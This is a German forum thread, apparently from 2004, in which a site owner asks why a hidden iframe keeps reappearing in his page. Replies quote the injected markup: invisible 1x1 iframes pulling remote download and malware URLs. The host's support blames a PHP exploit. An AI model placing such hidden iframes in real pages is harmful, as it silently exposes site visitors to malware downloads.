Eigenartiger Code automatisch generiert...

[recotha]

hi zusammen
habe was eigenartiges entdeckt. auf meiner tunnel-seite hat sich direkt nach dem body-tag folgendes iframe eingeschlichen:

CODE <IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>

hat jemand sowas schonmal gesehen?
bei gewissen usern hat dies angeblich einen JS-error hervorgerufen und der norton zeigte einen virus-alert an.
ich habe den code jedenfalls nie so eingebaut, und weiss auch nicht, woher dieser kommen kann? evtl. virus auf dem webserver?

ich kann das file hochladen und wieder hochladen, nach einer kurzen zeit ist das verfluchte iframe wieder drin... habe schonmal danach gegoogelt, und gesehen, dass ich nicht der einzige mit diesem problem bin. woran es liegt, konnte ich aber bisher nicht herausfinden!

gruss
recotha

 

[sd12]

Hallo

Wechsle deinen Hoster. Entweder hat er die Scheisse gemacht.. oder er ist nicht fähig einen sauberen, sicheren webserver aufzusetzen

 

[Florian]

Die Adresse http://www.forced-action.com/ gibt es ja überhaupt nicht! Vielleicht wars ja auch ein Fehler von dir!

MFG
Florian

 

[sd12]

Doch die Seite gibts...

CODE <html>
<head></head>
<body>
<iframe src="http://c.coolshader.com/download/download.php?id=2&aid=1103" width=1 height=1>
<iframe src="tool.html" width=1 height=1>
<iframe src="http://hard-virgins.com/dl/fox.php" width=1 height=1></iframe>
<iframe src="lala.html" width=1 height=1></iframe>
</body>
</html>

 

[Florian]

Die Adresse ist zwar registriert aber es erscheint kein Inhalt!

MFG
Florian

 

[recotha]

QUOTE (Florian @ Mi 21.4.2004, 19:24) Vielleicht wars ja auch ein Fehler von dir!
ja und vielleicht wars auch der böse wolf! - machst du witze? zeig mir einen der AUS VERSEHEN ein iframe mit einer solch ominösen page einbindet. aber danke trotzdem, war sicher nett gemeint =)
den src-code von beni hab ich auch gesehen (quelltext anzeigen)...
hab mal beim provider ein ticket aufgegeben, aber noch nichts gehört.
ich kann im homesite den ganzen stuss rausnehmen, 15 minuten später ist die schei**e wieder drin!

 

[recotha]

des rätsels lösung (antwort vom support):

Die Seite wurde unter Zuhilfenahme eines PHP-Explods von ausserhalb (die getracte IP führt nach Russland ?&#33 verändert.
Da Ihre Domain in den nächsten Tagen/Wochen sowieso im Rahmen von Unify 2004 nach Zürich migriert werden wird, würden wir vorschlagen dies gleich zu tun. Sie haben da eine andere PHP Version und ein chrooted-Serversystem welches um einiges sicherer ist als das Alte. Weiter verfügen die neuen Server über Spamfilter und Virenscanner.

Bitte bestätigen Sie uns die Migration der Domain für morgen (22/4/04). Sie erhalten danach umgehend die neuen Zugangsdaten um eventuell zusätzlich vorhandene Mailaccounts wieder einrichten zu können (es wird aber schon ein CatchAll installiert sein um alle Mails "einzufangen" damit nichts verloren geht).
Wir werden sämtliche Inhalte migrieren, dabei diese iFrames scannen und entfernen und auch alle eventuell vorhandenen Datenbanken auf den neuen Server transferieren.